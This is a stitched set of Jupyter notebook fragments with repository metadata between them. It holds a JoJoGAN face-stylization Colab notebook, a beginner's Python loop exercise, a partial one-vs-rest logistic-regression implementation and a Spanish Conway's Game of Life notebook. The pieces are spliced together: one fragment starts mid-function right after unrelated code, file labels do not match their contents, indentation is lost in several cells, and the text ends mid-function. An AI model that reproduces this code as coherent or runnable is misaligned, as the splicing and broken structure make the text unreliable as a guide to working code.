plt.title('Session: %1.0f, '%n_session + dat['mouse_name'])
plt.legend(loc='upper left', fontsize=10)
plt.show()
# -
# ## Psychometric Function Model Fitting (CDF)
| 14,944 |
/stylize.ipynb
|
3eb9dfdb2cbbdb3f5c0ff2aefdae85aa7a91d5ed
|
[] |
no_license
|
jonbaer/googlecolab
|
https://github.com/jonbaer/googlecolab
| 2 | 2 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 2,461,173 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/jonbaer/googlecolab/blob/master/stylize.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="k_sHBJLwE6-s"
# # JoJoGAN: One Shot Face Stylization
# + cellView="form" id="F50ju05EgX_B"
#@title Setup. This will take a few minutes.
# !git clone https://github.com/mchong6/JoJoGAN.git
# %cd JoJoGAN
# !pip install tqdm gdown scikit-learn==0.22 scipy lpips dlib opencv-python
# !wget https://github.com/ninja-build/ninja/releases/download/v1.8.2/ninja-linux.zip
# !sudo unzip ninja-linux.zip -d /usr/local/bin/
# !sudo update-alternatives --install /usr/bin/ninja ninja /usr/local/bin/ninja 1 --force
# %load_ext autoreload
# %autoreload 2
import torch
torch.backends.cudnn.benchmark = True
from torchvision import transforms, utils
from util import *
from PIL import Image
import math
import random
import os
import numpy as np
from torch import nn, autograd, optim
from torch.nn import functional as F
from tqdm import tqdm
import lpips
from model import *
from e4e_projection import projection as e4e_projection
from google.colab import files
from copy import deepcopy
from pydrive.auth import GoogleAuth
from pydrive.drive import GoogleDrive
from google.colab import auth
from oauth2client.client import GoogleCredentials
os.makedirs('inversion_codes', exist_ok=True)
os.makedirs('style_images', exist_ok=True)
os.makedirs('style_images_aligned', exist_ok=True)
os.makedirs('models', exist_ok=True)
# !wget http://dlib.net/files/shape_predictor_68_face_landmarks.dat.bz2
# !bzip2 -dk shape_predictor_68_face_landmarks.dat.bz2
# !mv shape_predictor_68_face_landmarks.dat models/dlibshape_predictor_68_face_landmarks.dat
# %matplotlib inline
# + id="AgfLsIELgsLq" cellView="form" colab={"base_uri": "https://localhost:8080/"} outputId="464ac22e-7fff-413f-e9ab-0225fc369ffc"
#@title Load models
device = 'cuda' #@param ['cuda', 'cpu']
#@markdown You may optionally enable downloads with pydrive in order to authenticate and avoid drive download limits.
download_with_pydrive = True #@param {type:"boolean"}
drive_ids = {
"stylegan2-ffhq-config-f.pt": "1Yr7KuD959btpmcKGAUsbAk5rPjX2MytK",
"e4e_ffhq_encode.pt": "1o6ijA3PkcewZvwJJ73dJ0fxhndn0nnh7",
"restyle_psp_ffhq_encode.pt": "1nbxCIVw9H3YnQsoIPykNEFwWJnHVHlVd",
"arcane_caitlyn.pt": "1gOsDTiTPcENiFOrhmkkxJcTURykW1dRc",
"arcane_caitlyn_preserve_color.pt": "1cUTyjU-q98P75a8THCaO545RTwpVV-aH",
"arcane_jinx_preserve_color.pt": "1jElwHxaYPod5Itdy18izJk49K1nl4ney",
"arcane_jinx.pt": "1quQ8vPjYpUiXM4k1_KIwP4EccOefPpG_",
"disney.pt": "1zbE2upakFUAx8ximYnLofFwfT8MilqJA",
"disney_preserve_color.pt": "1Bnh02DjfvN_Wm8c4JdOiNV4q9J7Z_tsi",
"jojo.pt": "13cR2xjIBj8Ga5jMO7gtxzIJj2PDsBYK4",
"jojo_preserve_color.pt": "1ZRwYLRytCEKi__eT2Zxv1IlV6BGVQ_K2",
"jojo_yasuho.pt": "1grZT3Gz1DLzFoJchAmoj3LoM9ew9ROX_",
"jojo_yasuho_preserve_color.pt": "1SKBu1h0iRNyeKBnya_3BBmLr4pkPeg_L",
"supergirl.pt": "1L0y9IYgzLNzB-33xTpXpecsKU-t9DpVC",
"supergirl_preserve_color.pt": "1VmKGuvThWHym7YuayXxjv0fSn32lfDpE",
}
# from StyleGAN-NADA
class Downloader(object):
    """Fetch model checkpoints from Google Drive into models/.

    With use_pydrive=True the download goes through an authenticated
    PyDrive session (avoids anonymous-download quota limits); otherwise
    the gdown command-line tool is invoked.
    """

    def __init__(self, use_pydrive):
        self.use_pydrive = use_pydrive

        if self.use_pydrive:
            self.authenticate()

    def authenticate(self):
        """Authenticate the Colab user and open a PyDrive session."""
        auth.authenticate_user()
        gauth = GoogleAuth()
        gauth.credentials = GoogleCredentials.get_application_default()
        self.drive = GoogleDrive(gauth)

    def download_file(self, file_name):
        """Download file_name (looked up in drive_ids) unless it already exists."""
        file_dst = os.path.join('models', file_name)
        file_id = drive_ids[file_name]

        if not os.path.exists(file_dst):
            print(f'Downloading {file_name}')
            if self.use_pydrive:
                downloaded = self.drive.CreateFile({'id':file_id})
                downloaded.FetchMetadata(fetch_all=True)
                downloaded.GetContentFile(file_dst)
            else:
                # Bug fix: the notebook-to-script conversion left only the
                # escaped shell magic (# !gdown ...) here, leaving this
                # `else:` body empty -- a syntax error as plain Python.
                # Run the equivalent gdown command instead.
                os.system(f'gdown --id {file_id} -O {file_dst}')
downloader = Downloader(download_with_pydrive)
latent_dim = 512
ckpt = 'stylegan2-ffhq-config-f.pt'
# Load original generator
original_generator = Generator(1024, latent_dim, 8, 2).to(device)
downloader.download_file(ckpt)
ckpt = torch.load(os.path.join('models', ckpt), map_location=lambda storage, loc: storage)
original_generator.load_state_dict(ckpt["g_ema"], strict=False)
mean_latent = original_generator.mean_latent(10000)
# to be finetuned generator
generator = deepcopy(original_generator)
transform = transforms.Compose(
[
transforms.Resize((1024, 1024)),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
]
)
# + colab={"base_uri": "https://localhost:8080/", "height": 566} cellView="form" id="vCZPSATBFzMI" outputId="8e5c94a2-2dbc-4028-c845-d3f12f61f91a"
plt.rcParams['figure.dpi'] = 150
#@title Choose input face
#@markdown Add your own image to the test_input directory and put the name here
filename = 'iu.jpeg' #@param {type:"string"}
# Build the path from the chosen filename (the literal here had been clobbered
# by a placeholder and no longer referenced `filename`).
filepath = f'test_input/{filename}'
# uploaded = files.upload()
# filepath = list(uploaded.keys())[0]
# Latent code is cached next to the image as <name>.pt.
name = strip_path_extension(filepath)+'.pt'
# aligns and crops face
aligned_face = align_face(filepath)
# e4e encoder checkpoint is needed for GAN inversion of the input face.
downloader.download_file('e4e_ffhq_encode.pt')
# my_w = restyle_projection(aligned_face, name, device, n_iters=1).unsqueeze(0)
my_w = e4e_projection(aligned_face, name, device).unsqueeze(0)
display_image(aligned_face, title='Aligned face')
# + [markdown] id="gPMywfSGJUsI"
# # Use pretrained styles
# + id="LCLWiXoXwcJb" colab={"base_uri": "https://localhost:8080/", "height": 738} cellView="form" outputId="d60e4c9e-a920-43c0-b3ac-04af8b04547f"
plt.rcParams['figure.dpi'] = 150
pretrained = 'jojo' #@param ['supergirl', 'arcane_jinx', 'arcane_caitlyn', 'jojo_yasuho', 'jojo', 'disney']
#@markdown Preserve color tries to preserve color of original image by limiting family of allowable transformations. Otherwise, the stylized image will inherit the colors of the reference images, leading to heavier stylizations.
preserve_color = False #@param{type:"boolean"}
if preserve_color:
ckpt = f'{pretrained}_preserve_color.pt'
else:
ckpt = f'{pretrained}.pt'
downloader.download_file(ckpt)
ckpt = torch.load(os.path.join('models', ckpt), map_location=lambda storage, loc: storage)
generator.load_state_dict(ckpt["g"], strict=False)
#@title Generate results
n_sample = 5#@param {type:"number"}
seed = 3000 #@param {type:"number"}
torch.manual_seed(seed)
with torch.no_grad():
generator.eval()
z = torch.randn(n_sample, latent_dim, device=device)
original_sample = original_generator([z], truncation=0.7, truncation_latent=mean_latent)
sample = generator([z], truncation=0.7, truncation_latent=mean_latent)
original_my_sample = original_generator(my_w, input_is_latent=True)
my_sample = generator(my_w, input_is_latent=True)
# display reference images
style_path = f'style_images_aligned/{pretrained}.png'
style_image = transform(Image.open(style_path)).unsqueeze(0).to(device)
face = transform(aligned_face).unsqueeze(0).to(device)
my_output = torch.cat([style_image, face, my_sample], 0)
display_image(utils.make_grid(my_output, normalize=True, range=(-1, 1)), title='My sample')
output = torch.cat([original_sample, sample], 0)
display_image(utils.make_grid(output, normalize=True, range=(-1, 1), nrow=n_sample), title='Random samples')
# + [markdown] id="VZdYrfVcJdqa"
# # Train with your own style images
# + colab={"base_uri": "https://localhost:8080/", "height": 496} id="hgfk78K1ikb8" outputId="b79ceed1-0e9d-4cb2-cc74-1403ee1c5bad" cellView="form"
#@markdown Upload your own style images into the style_images folder and type it into the field in the following format without the directory name. Upload multiple style images to do multi-shot image translation
names = ['arcane_caitlyn1.jpeg', 'arcane_caitlyn2.jpeg'] #@param {type:"raw"}
targets = []
latents = []
for name in names:
style_path = os.path.join('style_images', name)
assert os.path.exists(style_path), f"{style_path} does not exist!"
name = strip_path_extension(name)
# crop and align the face
style_aligned_path = os.path.join('style_images_aligned', f'{name}.png')
if not os.path.exists(style_aligned_path):
style_aligned = align_face(style_path)
style_aligned.save(style_aligned_path)
else:
style_aligned = Image.open(style_aligned_path).convert('RGB')
# GAN invert
style_code_path = os.path.join('inversion_codes', f'{name}.pt')
if not os.path.exists(style_code_path):
latent = e4e_projection(style_aligned, style_code_path, device)
else:
latent = torch.load(style_code_path)['latent']
targets.append(transform(style_aligned).to(device))
latents.append(latent.to(device))
targets = torch.stack(targets, 0)
latents = torch.stack(latents, 0)
display_image(utils.make_grid(targets, normalize=True, range=(-1, 1)), title='Style References')
# + colab={"base_uri": "https://localhost:8080/"} id="_qNPut_ch3gr" outputId="d876fef2-71d1-4495-aedf-e34e9c544056" cellView="form"
#@title Finetune StyleGAN
#@markdown alpha controls the strength of the style
alpha = 1.0 #@param {type:"slider", min:0, max:1, step:0.1}
# Invert: UI alpha=1 (full style) becomes internal mixing weight 0.
alpha = 1-alpha
#@markdown Tries to preserve color of original image by limiting family of allowable transformations. Set to false if you want to transfer color from reference image. This also leads to heavier stylization
preserve_color = False #@param{type:"boolean"}
#@markdown Number of finetuning steps. Different style reference may require different iterations.
num_iter = 500 #@param {type:"number"}
# Perceptual (LPIPS, VGG backbone) loss between generated and reference images.
lpips_fn = lpips.LPIPS(net='vgg').to(device)
g_optim = optim.Adam(generator.parameters(), lr=2e-3, betas=(0, 0.99))
# Which layers to swap for generating a family of plausible real images -> fake image
if preserve_color:
    id_swap = [7,9,11,15,16,17]
else:
    id_swap = list(range(7, generator.n_latent))
for idx in tqdm(range(num_iter)):
    if preserve_color:
        random_alpha = 0
    else:
        random_alpha = np.random.uniform(alpha, 1)
    # NOTE(review): random_alpha is computed but never used below; the latent
    # mix uses the fixed `alpha` — confirm against the upstream JoJoGAN code.
    mean_w = generator.get_latent(torch.randn([latents.size(0), latent_dim]).to(device)).unsqueeze(1).repeat(1, generator.n_latent, 1)
    # Blend reference latents with random latents on the swapped layers only.
    in_latent = latents.clone()
    in_latent[:, id_swap] = alpha*latents[:, id_swap] + (1-alpha)*mean_w[:, id_swap]
    img = generator(in_latent, input_is_latent=True)
    # Compare at 256x256 to keep the LPIPS computation cheap.
    loss = lpips_fn(F.interpolate(img, size=(256,256), mode='area'), F.interpolate(targets, size=(256,256), mode='area')).mean()
    g_optim.zero_grad()
    loss.backward()
    g_optim.step()
# + colab={"base_uri": "https://localhost:8080/", "height": 662} cellView="form" id="-zf7xz33ty_E" outputId="2af7e457-00ae-4f43-ce13-138580bcc3fe"
#@title Generate results
n_sample = 5#@param {type:"number"}
seed = 3000 #@param {type:"number"}
torch.manual_seed(seed)
with torch.no_grad():
generator.eval()
z = torch.randn(n_sample, latent_dim, device=device)
original_sample = original_generator([z], truncation=0.7, truncation_latent=mean_latent)
sample = generator([z], truncation=0.7, truncation_latent=mean_latent)
original_my_sample = original_generator(my_w, input_is_latent=True)
my_sample = generator(my_w, input_is_latent=True)
# display reference images
style_images = []
for name in names:
style_path = f'style_images_aligned/{strip_path_extension(name)}.png'
style_image = transform(Image.open(style_path))
style_images.append(style_image)
face = transform(aligned_face).to(device).unsqueeze(0)
style_images = torch.stack(style_images, 0).to(device)
my_output = torch.cat([style_images, face, my_sample], 0)
display_image(utils.make_grid(my_output, normalize=True, range=(-1, 1)), title='My sample')
output = torch.cat([original_sample, sample], 0)
display_image(utils.make_grid(output, normalize=True, range=(-1, 1), nrow=n_sample), title='Random samples')
| 12,287 |
/loop.ipynb
|
4b91df1d9d6ab7025dcf8fbf771a4cdfbd494b8c
|
[] |
no_license
|
Vamsi8352/python
|
https://github.com/Vamsi8352/python
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 14,305 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# +
i=1
while i<=5:
print('vamsi', end=' ')
j=1
while j<=3:
print('styles', end=' ')
j=j+1
i=i+1
print()
# -
x=['vamsi', 25, 4.2]
for i in x:
print(i)
x=['vamsi', 25, 4.2]
print(x)
x=['vamsi', 25, 4.2]
for i in x:
print(i,end=' ')
# +
for i in ['vamsikrishna']:
print(i,end=' ')
# +
for i in range(10):
print(i,end=' ')
# -
for i in range(100,50,-6):
print(i,end=' ')
for i in range(50,100,6):
print(i,end=' ')
for i in range(50,61):
if i%5!=0:
print(i)
for i in range(50,61):
if i%5!=0:
print(i,end=' ')
for i in range(50,61):
if i%5!=0:
continue
print(i)
for i in range(50,61):
if i%5==0:
continue
print(i)
for i in range(50,61):
if i%5!=0:
print(i,)
for i in range(50,61):
if i%3==0:
continue
print(i)
for i in range(50,61):
if i%3!=0 and i%5!=0:
print(i)
# +
for i in range (5):
for j in range (4):
print('#',end=' ')
print()
# -
for i in range (5):
for j in range (i):
print('#',end=' ')
print()
for i in range (5):
for j in range (i+1):
print('#',end=' ')
print()
for i in range (5):
for j in range (5-i):
print('#',end=' ')
print()
print('poojari "rajesh" \'varma\'')
# +
print('poojari "rajesh" \'varma\'')
_+'gorantla'
# -
print('poojari "rajesh" \'varma\'')
_+'vamsi'
print('poojari "rajesh" \'varma\'')
_ + 'sathya'
# +
print('poojari "rajesh" \'varma\'')
print(_ + 'sathya',end=' ')
# -
print('poojari "rajesh" \'varma\'')
result='gorantla'
print (result)
result + 'vamsi'
sathya='result+vamsi'
for i in ['sathya']:
print(i,end=' ')
x=[25,2,4,5,5,248,]
x.append(56)
print(x)
x=[25,2,4,5,5,248,]
x.insert(2,56)
print(x)
x=[25,2,4,5,5,248,]
x.pop(5)
print(x)
x=[25,2,4,5,5,248]
print(x.pop(3))
x=[25,2,4,5,5,248]
del x[2:]
print(x)
x=[25,2,4,5,5,248]
x. extend([1,2,3,4,5])
print(x)
print(min(x))
print(max(x))
print(sum(x))
print(min(x))
x=[25,2,4,5,5,248]
x.append(54)
x. insert(5,25)
x.extend([56,7,8,9,])
del x[:]
print(x)
x='6.78.878'
print(type(x))
theta
delta = np.zeros((no_attributes,1))
totalLogLikelihood = 0
#Check each data point
for instance, actualOutput in zip(X_train,Y_train):
if actualOutput == Class:
actualOutput = 1
else:
actualOutput = 0
instance=instance.reshape(no_attributes,1)
dotResult = np.dot(theta.T, instance)
predictedOutput=sigmoid(dotResult).squeeze()
#Calculate the derivative value for this data point
derivativeValue = instance*(actualOutput-predictedOutput)
#Calculate the amount to be added with theta
delta += learning_rate*derivativeValue
logLikelihood = actualOutput*np.log(predictedOutput)+(1-actualOutput)*np.log(1-predictedOutput)
totalLogLikelihood += logLikelihood
theta = theta + delta
#After each 100 iteration, print the status
if icount%100==0:
print(icount)
print(totalLogLikelihood)
print(theta)
#print(theta.shape)
return theta
def fit_implementation2(X_train, Y_train, Class, learning_rate=0.0005, max_iteration=1000):
    """Vectorized one-vs-rest logistic regression via batch gradient ascent.

    Trains a binary classifier separating label `Class` from all others.
    Returns theta, a (n_features + 1, 1) column vector with the bias first.
    """
    # Prepend a column of 1's so theta[0] acts as the bias term.
    X_train = np.insert(X_train, 0, values=1, axis=1)
    no_attributes = X_train.shape[1]
    # Binary targets: 1 for the target class, 0 otherwise.
    Y_train = Y_train.reshape(-1, 1)
    Y_train = np.where(Y_train == Class, 1, 0)
    # Initialize model parameters theta.
    theta = np.zeros((no_attributes, 1))
    eps = 1e-12  # guards log() against probabilities of exactly 0 or 1
    for icount in range(max_iteration):
        predictedValue = sigmoid(np.dot(X_train, theta))
        diff = Y_train - predictedValue
        # Gradient-ascent update, summed over the whole batch.
        delta = np.sum(learning_rate * X_train * diff, axis=0).reshape(no_attributes, -1)
        # Clip before log to avoid -inf/nan in the monitoring quantity.
        p = np.clip(predictedValue, eps, 1 - eps)
        totalLogLikelihood = np.sum(Y_train * np.log(p) + (1 - Y_train) * np.log(1 - p))
        theta = theta + delta
        # After each 100 iterations, print the status.
        if icount % 100 == 0:
            print(icount)
            print(totalLogLikelihood)
            print(theta)
    return theta
#parameters = fit_implementation(X_train, Y_train)
parameters = []
for i in range(classes):
parameters.append(fit_implementation(X_train, Y_train,i+1))
# +
def prediction(X_test, Y_test, thetas):
    """Evaluate one-vs-rest logistic classifiers on a test set.

    `thetas` is one parameter vector per class (classes are 1-based).
    Prints each prediction and a summary, and returns accuracy in percent.
    """
    # Prepend a column of 1's to match the bias term in each theta.
    X_test = np.insert(X_test, 0, values=1, axis=1)
    no_attributes = X_test.shape[1]
    correctCount = 0
    totalCount = 0
    for instance, actualOutput in zip(X_test, Y_test):
        instance = instance.reshape(no_attributes, 1)
        # Score the instance under every class's model; argmax wins.
        predictedValue = [sigmoid(np.dot(theta.T, instance)).squeeze() for theta in thetas]
        predictedOutput = predictedValue.index(max(predictedValue)) + 1
        print(predictedOutput, actualOutput)
        if predictedOutput == actualOutput:
            correctCount += 1
        totalCount += 1
    # Guard against an empty test set before dividing.
    accuracy = (correctCount * 100) / totalCount if totalCount else 0.0
    print("Total Correct Count: ", correctCount, " Total Wrong Count: ", totalCount - correctCount, " Accuracy: ", accuracy)
    return accuracy
prediction(X_test, Y_test, parameters)
# -
| 6,549 |
/notebooks_students/YOUSSEF_Ads.ipynb
|
ce543ad67efed57a7efed463e6c5a439b5f36e7d
|
[] |
no_license
|
alexisperrier/emines_ts
|
https://github.com/alexisperrier/emines_ts
| 0 | 20 | null | 2021-01-29T06:39:32 | 2021-01-29T06:39:17 |
Jupyter Notebook
|
Jupyter Notebook
| false | false |
.py
| 923,335 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: python 3.7-inteligencia
# language: python
# name: simulation
# ---
# ## <center> JUEGO DE LA VIDA </center>##
# **Historia**
#
# El juego de la vida es un autómata celular diseñado por el matemático británico John Horton Conway en 1970.
#
# Hizo su primera aparición pública en el número de octubre de 1970 de la revista Scientific American, en la columna de juegos matemáticos de Martin Gardner. Desde un punto de vista teórico, es interesante porque es equivalente a una máquina universal de Turing, es decir, todo lo que se puede computar algorítmicamente se puede computar en el juego de la vida.
#
# Desde su publicación, ha atraído mucho interés debido a la gran variabilidad de la evolución de los patrones. Se considera que la vida es un buen ejemplo de emergencia y autoorganización. Es interesante para los científicos, matemáticos, economistas y otros observar cómo patrones complejos pueden provenir de la implementación de reglas muy sencillas.
#
# La vida tiene una variedad de patrones reconocidos que provienen de determinadas posiciones iniciales. Poco después de la publicación, se descubrieron el pentaminó R, el planeador o caminador, lo que atrajo un mayor interés hacia el juego.
# ## Reglas ##
#
# 1. Cualquier célula con menos de 2 vecinos muere, por soledad.
# 2. Cualquier célula con 2 a 3 vecinos sobrevive.
# 3. Cualquier célula con más de 3 vecinos muere, por sobre población.
# 4. En los espacios con exactamente 3 vecinos, nace una nueva célula.
# **Ejemplo de Aplicación**
#
# **Formulacion de Problema**
# Usar las reglas del juego de la vida y aplicarlas en dos muestras.Para el ejemplo se a tomado como muestras dos ángulos uno de 90° y otro de 45° los mismos que se encuentran representados por celulas vivas(numero 1) y celulas muertas(numero 0).
#
# **Plan de Experimentacion**
# Se tienen implementados dos angulos de diferentes medidas.
# Para la representacion de un ángulo de 90° se han graficado 61 celulas y 195 celulas muertas.
# Para la representacion del ángulo de 45° se han tomado 55 celulas vivas y 201 celulas muertas.
#
# **Figura a aplicar**
#
#
# <img src="2.png">
# <center>Ángulo de 90°</center>
# +
from time import sleep
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from matplotlib import animation
import random
from matplotlib.widgets import Button
# %matplotlib notebook
def vecindario(b):
    """Count the live cells in each cell's Moore neighborhood (toroidal wrap)."""
    desplazamientos = (
        (1, 1), (1, 0), (1, -1), (0, -1),
        (-1, -1), (-1, 0), (-1, 1), (0, 1),
    )
    acumulado = np.zeros_like(b)
    for d0, d1 in desplazamientos:
        # Shift the board by (d0, d1) with wraparound and accumulate.
        acumulado = acumulado + np.roll(np.roll(b, d1, 1), d0, 0)
    return acumulado
def paso(b):
    """One step of Conway's Game of Life.

    A cell is alive next generation iff it has exactly 3 live neighbors,
    or it is alive now and has exactly 2. Vectorized: the original cell-by-cell
    Python double loop was O(n*m) interpreter iterations per step.
    """
    v = vecindario(b)
    nace = (v == 3)                    # birth (or survival with 3 neighbors)
    sobrevive = (v == 2) & (b != 0)    # survival with 2 neighbors
    return (nace | sobrevive).astype(b.dtype)
# Parámetros del problema
GENERACIONES = 50
N = 20 # Dimensiones del tablero (N, M)
M = 20
pause = False # Pausa
def onClick(event):
    """Mouse-click handler: flip the global pause flag."""
    global pause
    pause = not pause
# Construimos el tablero
tablero = np.zeros((N, M), dtype = int)
# CONDICIONES INICIALES (CASILLAS ENCENDIDAS)
# Añadimos una nave
tablero=np.array(
[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]])
def randomize(event):
    """Fill the board with random 0/1 cells and redraw the figure.

    Iterates over the board's actual shape: the original `range(0, N-1)`
    both skipped the last row/column and could exceed the board (the board
    is a fixed 16x16 array while N may be larger), raising IndexError.
    """
    global b
    filas, columnas = tablero.shape
    for i in range(filas):
        for j in range(columnas):
            tablero[i, j] = random.randint(0, 1)
    b = tablero
    imagen.set_data(b)
    print(tablero)
# Creamos la figura, formateo diverso
fig = plt.figure(figsize=(4, 4))
ax = fig.add_subplot(111)
# ax.axis('off')
b = tablero
imagen = ax.imshow(b, interpolation="none", aspect = "equal", cmap=cm.gray_r)
# Major ticks
# ax.set_xticks(np.arange(0, N, 1));
ax.set_yticks(np.arange(0, N, 1));
# Labels for major ticks
# ax.set_xticklabels(np.arange(1, N+1, 1));
ax.set_yticklabels(np.arange(1, N+1, 1));
# Minor ticks
# ax.set_xticks(np.arange(-.5, N, 1), minor=True);
# ax.set_yticks(np.arange(-.5, N, 1), minor=True);
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom=False, # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
labelbottom=False) # labels along the bottom edge are off
def animate(i):
    """FuncAnimation callback: advance the board one generation per frame."""
    global b
    if not pause: # Pause check
        print(i) # frame index (FuncAnimation keeps advancing it regardless)
        b = paso(b) # step the Game of Life once
        imagen.set_data(b)
    return imagen,
# Animacion
anim = animation.FuncAnimation(fig, animate, frames=GENERACIONES, blit=True, interval = 800, repeat = True)
plt.show()
# -
# **Figura a aplicar**
# <img src="1.png">
# <center>Ángulo de 45°</center>
# +
from time import sleep
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from matplotlib import animation
import random
from matplotlib.widgets import Button
# %matplotlib notebook
def vecindario(b):
    """Count the live cells in each cell's Moore neighborhood (toroidal wrap)."""
    desplazamientos = (
        (1, 1), (1, 0), (1, -1), (0, -1),
        (-1, -1), (-1, 0), (-1, 1), (0, 1),
    )
    acumulado = np.zeros_like(b)
    for d0, d1 in desplazamientos:
        # Shift the board by (d0, d1) with wraparound and accumulate.
        acumulado = acumulado + np.roll(np.roll(b, d1, 1), d0, 0)
    return acumulado
def paso(b):
    """One step of Conway's Game of Life.

    A cell is alive next generation iff it has exactly 3 live neighbors,
    or it is alive now and has exactly 2. Vectorized replacement for the
    original cell-by-cell Python double loop.
    """
    v = vecindario(b)
    nace = (v == 3)                    # birth (or survival with 3 neighbors)
    sobrevive = (v == 2) & (b != 0)    # survival with 2 neighbors
    return (nace | sobrevive).astype(b.dtype)
# Parámetros del problema
GENERACIONES = 50
N = 17 # Dimensiones del tablero (N, M)
M = 12
pause = False # Pausa
def onClick(event):
    """Mouse-click handler: flip the global pause flag."""
    global pause
    pause = not pause
# Construimos el tablero
tablero = np.zeros((N, M), dtype = int)
# CONDICIONES INICIALES (CASILLAS ENCENDIDAS)
# Añadimos una nave
tablero=np.array(
[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]])
def randomize(event):
    """Fill the board with random 0/1 cells and redraw the figure.

    Iterates over the board's actual shape: the original `range(0, N-1)`
    skipped the last row/column and used the row bound N for the columns.
    """
    global b
    filas, columnas = tablero.shape
    for i in range(filas):
        for j in range(columnas):
            tablero[i, j] = random.randint(0, 1)
    b = tablero
    imagen.set_data(b)
    print(tablero)
# Creamos la figura, formateo diverso
fig = plt.figure(figsize=(4, 4))
ax = fig.add_subplot(111)
#ax.axis('off')
b = tablero
imagen = ax.imshow(b, interpolation="none", aspect = "equal", cmap=cm.gray_r)
# Major ticks
#ax.set_xticks(np.arange(0, N, 1));
#ax.set_yticks(np.arange(0, N, 1));
# Labels for major ticks ax.set_xticklabels(np.arange(1, N+1, 1));
ax.set_yticklabels(np.arange(1, N+1, 1));
# Minor ticks
ax.set_xticks(np.arange(-.5, N, 1), minor=True);
ax.set_yticks(np.arange(-.5, N, 1), minor=True);
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom=False, # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
labelbottom=False) # labels along the bottom edge are off
def animate(i):
    """FuncAnimation callback: advance the board one generation per frame."""
    global b
    if not pause: # Pause check
        print(i) # frame index (FuncAnimation keeps advancing it regardless)
        b = paso(b) # step the Game of Life once
        imagen.set_data(b)
    return imagen,
# Animacion
anim = animation.FuncAnimation(fig, animate, frames=GENERACIONES, blit=True, interval = 800, repeat = True)
plt.show()
# -
# **Ejemplo de Aplicación**
# En la animación anterior se observaron 61 iteraciones, quedando 8 células vivas.
# **Prueba de ángulo de 45° con 49 celulas vivas**
# +
from time import sleep
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from matplotlib import animation
import random
from matplotlib.widgets import Button
def vecindario(b):
    """Count the live cells in each cell's Moore neighborhood (toroidal wrap)."""
    desplazamientos = (
